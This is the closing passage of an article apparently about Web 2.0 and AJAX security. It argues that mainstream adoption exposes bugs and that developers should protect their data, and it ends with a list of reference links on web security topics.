      d) If your architecture is insecure, no technology can rescue you

What Web 2.0 is doing is making these technologies mainstream. As more people use them, more bugs surface, and more people think of hacking insecure sites for fun and profit (nothing new there). I think this will be beneficial for the web community overall – there is nothing like taking a technology mainstream to make it robust! But in the process, developers and marketers need to be aware that this is an evolving process, and they should do everything possible to safeguard their own data from the imperfections in the implementations of their chosen tools.

      References
      http://namb.la/popular/tech.html
      http://ajaxian.com/by/topic/security/
      http://www.technicalinfo.net/papers/CSS.html
      http://insecure.org/stf/smashstack.html
http://www.actionscripthero.com/adventures/
http://www.viruslist.com/en/analysis?pubid=184625030